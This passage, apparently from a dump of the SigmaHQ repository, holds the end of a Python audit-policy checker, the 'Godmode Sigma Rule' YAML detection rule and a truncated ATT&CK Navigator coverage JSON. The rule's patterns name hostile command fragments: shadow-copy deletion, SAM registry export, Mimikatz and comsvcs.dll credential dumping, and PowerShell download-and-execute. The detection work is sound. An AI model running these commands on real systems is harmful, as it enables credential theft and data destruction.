PowerShell\"\n            #pwsh7 = \"PowerShell Core\" # TODO: Add PWSH7 Checks\n\n            if pwsh5 in enabled_other_logs:\n                if enabled_other_logs[pwsh5][0]['Turn on Module Logging'] != \"Enabled\":\n                    print(\"-> Rules use Microsoft-Windows-PowerShell EID 4103. Audit policy 'Module Logging' must be enabled\")\n                else:\n                    print(\"-> PowerShell 'Module Logging' is Enabled\")\n        \n        if windows_category_ps_script_dict:\n            print(f\"\\nChecking rules with logsource - 'product: windows / category: ps_script'...\")\n            \n            pwsh5 = \"Windows Components/Windows PowerShell\"\n            #pwsh7 = \"PowerShell Core\" # TODO: Add PWSH7 Checks\n\n            if pwsh5 in enabled_other_logs:\n                if enabled_other_logs[pwsh5][1]['Turn on PowerShell Script Block Logging'] != \"Enabled\":\n                    print(\"-> Rules use Microsoft-Windows-PowerShell EID 4104. Audit policy PowerShell 'Script Block Logging' must be enabled\")\n                else:\n                    print(\"-> PowerShell 'Script Block Logging' is Enabled\")\n        \n        if windows_service_security_dict:\n            print(f\"\\nChecking rules using logsource - 'product: windows / service: security'...\")\n            all_security_eids = []\n            for filename, eids in windows_service_security_dict.items():\n                all_security_eids += eids\n            all_security_eids = list(set(all_security_eids))\n            for eid in all_security_eids:\n                for key, value in SECURITY_EVENT_ID_MAPPING.items():\n                    if value['EventIDs']:\n                        if ((eid in value['EventIDs']) and (key not in subcategory_id)):\n                            print(\"-> Rules use events generated from audit policy sub-category '{}'. The audit policy '{}' must be enabled\".format(key, value['Name']))\n                            subcategory_id.append(key)\n        \n    print(\"\\nFor more information on how to setup logging, you can visit: https://github.com/SigmaHQ/sigma/tree/master/rules-documentation/logsource-guides\") \n"
  },
  {
    "path": "other/godmode_sigma_rule.yml",
    "content": "#    _____        __  __  ___        __      \n#   / ___/__  ___/ / /  |/  /__  ___/ /__    \n#  / (_ / _ \\/ _  / / /|_/ / _ \\/ _  / -_)   \n#  \\___/\\___/\\_,_/ /_/  /_/\\___/\\_,_/\\__/_   \n#    / __(_)__ ___ _  ___ _  / _ \\__ __/ /__ \n#   _\\ \\/ / _ `/  ' \\/ _ `/ / , _/ // / / -_)\n#  /___/_/\\_, /_/_/_/\\_,_/ /_/|_|\\_,_/_/\\__/ \n#        /___/ IDDQD                              \n#\n#  Florian Roth\n#  May 2020\n#  v0.3\n#\n#  A Proof-of-Concept with the most effective search queries\n\ntitle: Godmode Sigma Rule\nid: def6caac-a999-4fc9-8800-cfeff700ba98\ndescription: 'PoC rule to detect malicious activity - following the principle: if you had only one shot, what would you look for?'\nstatus: experimental\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-12-22\nmodified: 2022-08-04\nlevel: high\naction: global\n---\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Different suspicious or malicious command line parameters\n    selection_plain:\n        CommandLine|contains:\n            - ' -NoP '  # Often used in malicious PowerShell commands\n            - ' -W Hidden '  # Often used in malicious PowerShell commands\n            - ' -decode '  # Used with certutil\n            - ' /decode '  # Used with certutil\n            - ' -e* JAB'  # PowerShell encoded commands\n            - ' -e* SUVYI'  # PowerShell encoded commands\n            - ' -e* SQBFAFgA'  # PowerShell encoded commands\n            - ' -e* aWV4I'  # PowerShell encoded commands\n            - ' -e* IAB'  # PowerShell encoded commands\n            - ' -e* PAA'  # PowerShell encoded commands\n            - ' -e* aQBlAHgA'  # PowerShell encoded commands\n            - 'vssadmin delete shadows'  # Ransomware\n            - 'reg SAVE HKLM\\SAM'  # save registry SAM - syskey extraction\n            - ' -ma '  # ProcDump\n            - 'Microsoft\\Windows\\CurrentVersion\\Run'  # Run key in command line - often in combination with REG ADD\n            - '.downloadstring('  # PowerShell download command\n            - '.downloadfile('  # PowerShell download command\n            - ' /ticket:'  # Rubeus\n            - ' sekurlsa'  # Mimikatz\n            - ' p::d '  # Mimikatz\n            - ';iex('  # PowerShell IEX\n            - 'schtasks* /create *AppData'  # Scheduled task creation pointing to AppData\n            - ' comsvcs.dll,MiniDump'  # Process dumping method apart from procdump\n            - ' comsvcs.dll,#24'  # Process dumping method apart from procdump\n            - ' comsvcs.dll MiniDump'  # Process dumping method apart from procdump\n            - ' comsvcs.dll #24'  # Process dumping method apart from procdump\n            - ' comsvcs `#'  # Process dumping method apart from procdump\n            - ' comsvcs #'  # Process dumping method apart from procdump\n            - ' comsvcs MiniDump'  # Process dumping method apart from procdump\n            - '.dmp full'  # Process dumping method apart from procdump\n    selection_parent_child:\n        ParentImage|contains:\n            # Office Dropper Detection\n            - '\\WINWORD.EXE'\n            - '\\EXCEL.EXE'\n            - '\\POWERPNT.exe'\n            - '\\MSPUB.exe'\n            - '\\VISIO.exe'\n            - '\\OUTLOOK.EXE'\n        Image|contains:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n            - '\\schtasks.exe'\n            - '*\\scrcons.exe'\n            - '\\regsvr32.exe'\n            - '\\hh.exe'\n            - '\\wmic.exe'\n            - '\\mshta.exe'\n            - '\\msiexec.exe'\n            - '\\forfiles.exe'\n            - '\\AppData\\'\n    selection_webshells:\n        Image|contains:\n            - '\\apache*'\n            - '\\tomcat*'\n            - '\\w3wp.exe'\n            - '\\php-cgi.exe'\n            - '\\nginx.exe'\n            - '\\httpd.exe'\n        CommandLine|contains:\n            - 'whoami'\n            - 'net user '\n            - 'ping -n '\n            - 'systeminfo'\n            - '&cd&echo'\n            - 'cd /d '  # https://www.computerhope.com/cdhlp.htm\n    # Running whoami as LOCAL_SYSTEM (usually after privilege escalation)\n    selection_whoami:\n        Image|contains: '\\whoami.exe'\n        User|contains: \n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: 1 of them\n---\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection_file_creation:\n        EventID: 11\n        TargetFilename|contains:\n            - '.dmp'  # dump process memory\n            - 'Desktop\\how'  # Ransomware\n            - 'Desktop\\decrypt'  # Ransomware\n    selection_registry_modifications:\n        EventID:\n            - 12\n            - 13\n        TargetObject|contains:\n            - 'UserInitMprLogonScript'  # persistence\n            - '\\CurrentVersion\\Image File Execution Options\\'  # persistence\n    selection_registry_run:\n        EventID:\n            - 12\n            - 13\n        TargetObject|contains:\n            - '\\Microsoft\\Windows\\CurrentVersion\\Run\\'  # persistence\n            - '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'   # persistence\n        Details|contains:\n            - 'AppData'\n            - '\\Users\\Public\\'\n            - '\\Temp\\'\n            - 'powershell'\n            - 'wscript'\n            - 'cscript'\n    condition: 1 of them\n---\nlogsource:\n    product: windows\n    service: system\ndetection:\n    # Malicious service installs\n    selection:\n        EventID: 7045\n        ServiceName|contains:\n            - 'WCESERVICE'\n            - 'WCE SERVICE'\n            - 'winexesvc'\n            - 'DumpSvc'\n            - 'pwdump'\n            - 'gsecdump'\n            - 'cachedump'\n    condition:\n        1 of them"
  },
  {
    "path": "other/sigma_attack_nav_coverage.json",
    "content": "{\n  \"name\": \"Sigma Analytics Coverage\",\n  \"versions\": {\n    \"attack\": \"18.1\",\n    \"navigator\": \"4.8.1\",\n    \"layer\": \"4.4\"\n  },\n  \"domain\": \"enterprise-attack\",\n  \"description\": \"Sigma coverage heatmap generated by Sigma CLI with score function count\",\n  \"gradient\": {\n    \"colors\": [\n      \"#66b1ffff\",\n      \"#ff66f4ff\"\n    ],\n    \"minValue\": 0,\n    \"maxValue\": 20\n  },\n  \"techniques\": [\n    {\n      \"techniqueID\": \"T1078\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 60,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078\",\n      \"tactic\": \"persistence\",\n      \"score\": 60,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 60,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078\",\n      \"tactic\": \"initial-access\",\n      \"score\": 60,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1114.003\",\n      \"tactic\": \"collection\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1090\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 22,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1606\",\n      \"tactic\": \"credential-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1528\",\n      \"tactic\": \"credential-access\",\n      \"score\": 14,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1140\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 18,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098\",\n      \"tactic\": \"persistence\",\n      \"score\": 29,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 29,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1589\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1110\",\n      \"tactic\": \"credential-access\",\n      \"score\": 25,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.004\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 40,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.004\",\n      \"tactic\": \"persistence\",\n      \"score\": 40,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.004\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 40,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.004\",\n      \"tactic\": \"initial-access\",\n      \"score\": 40,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1552\",\n      \"tactic\": \"credential-access\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 22,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 22,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556\",\n      \"tactic\": \"credential-access\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556\",\n      \"tactic\": \"persistence\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1484\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1484\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098.005\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098.005\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1485\",\n      \"tactic\": \"impact\",\n      \"score\": 20,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1496\",\n      \"tactic\": \"impact\",\n      \"score\": 13,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1489\",\n      \"tactic\": \"impact\",\n      \"score\": 19,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.003\",\n      \"tactic\": \"execution\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1552.007\",\n      \"tactic\": \"credential-access\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.004\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 29,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1552.001\",\n      \"tactic\": \"credential-access\",\n      \"score\": 24,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.007\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1565.001\",\n      \"tactic\": \"impact\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1003\",\n      \"tactic\": \"credential-access\",\n      \"score\": 34,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059\",\n      \"tactic\": \"execution\",\n      \"score\": 94,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 27,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 127,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1578\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1578.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1531\",\n      \"tactic\": \"impact\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1621\",\n      \"tactic\": \"credential-access\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556.006\",\n      \"tactic\": \"credential-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556.006\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556.006\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1087.004\",\n      \"tactic\": \"discovery\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1526\",\n      \"tactic\": \"discovery\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1565\",\n      \"tactic\": \"impact\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1074\",\n      \"tactic\": \"collection\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1484.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1484.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1114\",\n      \"tactic\": \"collection\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1573\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1199\",\n      \"tactic\": \"initial-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1537\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1486\",\n      \"tactic\": \"impact\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1020\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1136.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 20,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550.001\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1190\",\n      \"tactic\": \"initial-access\",\n      \"score\": 146,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.001\",\n      \"tactic\": \"execution\",\n      \"score\": 217,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.003\",\n      \"tactic\": \"execution\",\n      \"score\": 44,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.004\",\n      \"tactic\": \"execution\",\n      \"score\": 14,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.009\",\n      \"tactic\": \"execution\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1021.007\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.008\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1608.003\",\n      \"tactic\": \"resource-development\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1525\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1566\",\n      \"tactic\": \"initial-access\",\n      \"score\": 14,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1566.002\",\n      \"tactic\": \"initial-access\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1580\",\n      \"tactic\": \"discovery\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1619\",\n      \"tactic\": \"discovery\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1005\",\n      \"tactic\": \"collection\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1490\",\n      \"tactic\": \"impact\",\n      \"score\": 26,\n      \"color\": \"\",\n      \"comment\": \"\",\n      